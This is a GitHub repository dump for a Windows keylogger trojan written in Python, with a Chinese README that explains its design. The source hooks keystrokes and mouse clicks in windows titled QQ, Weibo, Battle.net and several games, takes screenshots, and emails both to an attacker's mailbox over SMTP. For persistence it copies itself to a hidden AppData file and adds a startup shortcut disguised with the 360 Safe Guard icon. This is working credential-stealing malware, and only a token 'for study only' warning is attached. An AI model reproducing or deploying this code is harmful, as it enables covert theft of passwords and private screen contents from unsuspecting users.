├── .gitattributes ├── .gitignore ├── ABE.glj ├── LICENSE.txt ├── README.md └── keyboard_recording_trojan.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | lib/ 17 | lib64/ 18 | parts/ 19 | sdist/ 20 | var/ 21 | *.egg-info/ 22 | .installed.cfg 23 | *.egg 24 | 25 | # PyInstaller 26 | # Usually these files are written by a python script from a template 27 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 28 | *.manifest 29 | *.spec 30 | 31 | # Installer logs 32 | pip-log.txt 33 | pip-delete-this-directory.txt 34 | 35 | # Unit test / coverage reports 36 | htmlcov/ 37 | .tox/ 38 | .coverage 39 | .cache 40 | nosetests.xml 41 | coverage.xml 42 | 43 | # Translations 44 | *.mo 45 | *.pot 46 | 47 | # Django stuff: 48 | *.log 49 | 50 | # Sphinx documentation 51 | docs/_build/ 52 | 53 | # PyBuilder 54 | target/ 55 | 56 | # ========================= 57 | # Operating System Files 58 | # ========================= 59 | 60 | # OSX 61 | # ========================= 62 | 63 | .DS_Store 64 | .AppleDouble 65 | .LSOverride 66 | 67 | # Thumbnails 68 | ._* 69 | 70 | # Files that might appear on external disk 71 | .Spotlight-V100 72 | .Trashes 73 | 74 | # Directories potentially created on remote AFP share 75 | .AppleDB 76 | .AppleDesktop 77 | Network Trash Folder 78 | Temporary Items 79 | .apdisk 80 | 81 | # Windows 82 | # ========================= 83 | 84 | # Windows image file caches 85 | Thumbs.db 86 | ehthumbs.db 87 | 88 | # Folder config file 89 | Desktop.ini 90 | 91 | # Recycle Bin used on file shares 92 | $RECYCLE.BIN/ 93 | 94 | # Windows Installer files 95 | *.cab 96 | *.msi 97 | *.msm 98 | *.msp 99 | 100 | # Windows shortcuts 101 | *.lnk 102 | -------------------------------------------------------------------------------- /ABE.glj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Jackeriss/keyboard_recording_trojan/2fb62b7362b6a615a67ee17849a4672ece5a6914/ABE.glj -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2014 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 键盘记录木马 2 | [![EOL](https://img.shields.io/badge/Status-EOL-lightgrey.svg?style=flat-square)]() 3 | 一个可以记录键盘输入并发送到指定邮箱的简单木马。 4 | ## 警告 5 | 禁止用于非法活动 6 | ## 说明 7 | 1、本压缩包中含有经过伪装的360安全卫士图标文件“ABE.glj”, 8 | 2、若要打包进行测试则可将程序名改为“开始游戏”或更改源码中相应的位置,否则无法完成将自身复制到C盘。 9 | ## 介绍 10 | 它可以根据要记录密码的关键词(如“QQ”)匹配当前活动窗口,若含有关键词则记录用户在此窗口内的所有输入,当用户输入回车或点击鼠标左键时进行屏幕截图,并将所记录的输入信息和截图发送到指定邮箱。 11 | ![1](http://img.blog.csdn.net/20150309214837529) 12 | 可我又怎么会那么容易满足呢?让我们来把它做得更像木马一些吧! 首先,它不能长得就像个木马,我们来把它伪装成一个游戏的开始程序。 13 | ![2](http://img.blog.csdn.net/20150309214847716) 14 | 其次,在这个游戏文件夹中很没有安全感,很容易就会被用户删掉!我们在运行时自动将本体复制至C盘指定文件夹中,并且将其设置为隐藏文件! 15 | ![3](http://img.blog.csdn.net/20150309214857544) 16 | 我这么拼命保护它就是因为我要让它开机自动运行!修改注册表是一种办法,还有一种更简单的办法是在启动文件夹创建一个快捷方式。 17 | ![4](http://img.blog.csdn.net/20150309214905469) 18 | 不要以为就这样就完了!这时用户一定会察觉:疑,我昨天下的游戏怎么会开机启动?于是打开了360。。。我们何不自带伪装,把自己伪装成360,这样用户就会以为那个开机自动启动的程序是360!于是就有了这个经过伪装的图标文件! 19 | ![5](http://img.blog.csdn.net/20150309214802212) 20 | -------------------------------------------------------------------------------- /keyboard_recording_trojan.py: -------------------------------------------------------------------------------- 1 | # -*- coding: cp936 -*- # 2 | 3 | # A keyboard recording trojan 4 | # Copyright (c) 2015 Jackeriss. 5 | # Released under MIT license 6 | # 警告:本源码仅供学习交流使用,禁止用于任何非法用途! 7 | 8 | """ 9 | Author: Jackeriss 10 | Email: i@jackeriss.com 11 | Site: http://www.jackeriss.com 12 | """ 13 | 14 | import os 15 | import time 16 | import pythoncom 17 | import shutil 18 | import smtplib 19 | import pyHook 20 | from PIL import ImageGrab 21 | from win32com.shell import shell 22 | from win32com.shell import shellcon 23 | from email.mime.multipart import MIMEMultipart 24 | from email.mime.text import MIMEText 25 | from email.mime.image import MIMEImage 26 | sender = '123456789@qq.com'#邮件发送方 27 | receiver = '123456789@qq.com'#邮件接收方 28 | subject = 'python email test' 29 | smtpserver = 'smtp.qq.com'#邮件服务器 30 | username = '123456789'#邮件用户名 31 | password = '1111111'#邮件密码 32 | smtp = smtplib.SMTP() 33 | startup_path = shell.SHGetPathFromIDList(shell.SHGetSpecialFolderLocation(0,shellcon.CSIDL_STARTUP)) 34 | appdata_path = shell.SHGetPathFromIDList(shell.SHGetSpecialFolderLocation(0,shellcon.CSIDL_APPDATA)) 35 | 36 | def set_shortcut(filename,lnkname,iconname): 37 | shortcut = pythoncom.CoCreateInstance( 38 | shell.CLSID_ShellLink, None, 39 | pythoncom.CLSCTX_INPROC_SERVER, shell.IID_IShellLink) 40 | shortcut.SetPath(filename) 41 | shortcut.SetIconLocation(iconname,0) 42 | if os.path.splitext(lnkname)[-1] != '.lnk': 43 | lnkname += ".lnk" 44 | shortcut.QueryInterface(pythoncom.IID_IPersistFile).Save(lnkname,0) 45 | 46 | #如果是远程监听某个电脑,可以将获取到的信息通过邮件发出去 47 | def send_email(msg,file_name): 48 | msgRoot = MIMEMultipart('related') 49 | msgRoot['Subject'] = file_name#邮件标题 50 | 51 | msgText = MIMEText('%s'%msg,'html','utf-8')#发送HTML形式的文字信息 52 | msgRoot.attach(msgText) 53 | 54 | att = MIMEText(open('%s'%file_name, 'rb').read(), 'base64', 'utf-8')#将屏幕截图作为附件 55 | att["Content-Type"] = 'application/octet-stream' 56 | att["Content-Disposition"] = 'attachment; filename="%s"'%file_name 57 | msgRoot.attach(att) 58 | while 1: 59 | try: 60 | smtp.sendmail(sender, receiver, msgRoot.as_string()) 61 | break 62 | except: 63 | try: 64 | smtp.connect('smtp.qq.com')#尝试登陆SMTP邮件服务器 65 | smtp.login(username, password) 66 | except: 67 | print "failed to login to smtp server" 68 | path=os.getcwd()+"\\"+file_name#删除本地截图 69 | if os.path.exists(path): 70 | os.remove(path) 71 | 72 | def onMouseEvent(event): 73 | # 监听鼠标事件 74 | global MSG 75 | if len(MSG)!=0: 76 | pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time())) 77 | pic_name = "mouse_"+pic_name+".png" 78 | pic = ImageGrab.grab() 79 | pic.save('%s' % pic_name)#将用户屏幕截图,保存到本地 80 | send_email(MSG,pic_name) 81 | ## write_msg_to_txt(MSG) 82 | MSG='' 83 | return True 84 | 85 | def onKeyboardEvent(event): 86 | #监听键盘事件 87 | global MSG 88 | title= event.WindowName.decode('GBK') 89 | #通过窗口的title,判断当前窗口是否是“监听目标” 90 | if title.find(u"魔兽世界") != -1 or title.find(u"英雄联盟") != -1 or title.find(u'QQ')!=-1 or title.find(u'微博')!=-1 or title.find(u'战网')!=-1: 91 | #Ascii: 8-Backspace , 9-Tab ,13-Enter 92 | if (127 >= event.Ascii > 31) or (event.Ascii == 8): 93 | MSG += chr(event.Ascii) 94 | if (event.Ascii == 9) or (event.Ascii == 13): 95 | #屏幕抓图实现 96 | pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time())) 97 | pic_name = "keyboard_"+pic_name+".png" 98 | pic = ImageGrab.grab()#保存成为以日期命名的图片 99 | pic.save('%s' % pic_name) 100 | send_email(MSG,pic_name) 101 | ## write_msg_to_txt(MSG) 102 | MSG = '' 103 | return True 104 | 105 | if __name__ == "__main__": 106 | icon_file=os.getcwd()+"\\"+"ABE.glj"#源图标位置 107 | exe_file=os.getcwd()+"\\"+"开始游戏.exe"#源程序位置 108 | icon_copy=appdata_path+"\\"+"360安全卫士.ico"#目标图标位置 109 | exe_copy=appdata_path+"\\"+"youxun.exe"#目标程序位置 110 | if os.path.exists(icon_file) and os.path.exists(exe_file):#源位置无误则复制到目标位置 111 | shutil.copy(exe_file,exe_copy) 112 | if os.path.exists(icon_copy) and os.path.exists(exe_copy):#一切顺利则设置隐藏和快捷方式 113 | cmd1 = 'attrib +h "' + icon_copy +'"' 114 | os.popen(cmd1).close() 115 | cmd2 = 'attrib +h "' + exe_copy +'"' 116 | os.popen(cmd2).close() 117 | lnk_name=startup_path+"\\360安全卫士.lnk" 118 | set_shortcut(exe_copy,lnk_name,icon_copy) 119 | try: 120 | smtp.connect('smtp.qq.com')#尝试登陆SMTP邮件服 121 | smtp.login(username, password) 122 | except: 123 | print "failed to login to smtp server" 124 | MSG = '' 125 | #创建hook句柄 126 | hm = pyHook.HookManager() 127 | #监控鼠标 128 | hm.SubscribeMouseLeftDown(onMouseEvent) 129 | hm.HookMouse() 130 | #监控键盘 131 | hm.KeyDown = onKeyboardEvent 132 | hm.HookKeyboard() 133 | #循环获取消息 134 | pythoncom.PumpMessages() 135 | --------------------------------------------------------------------------------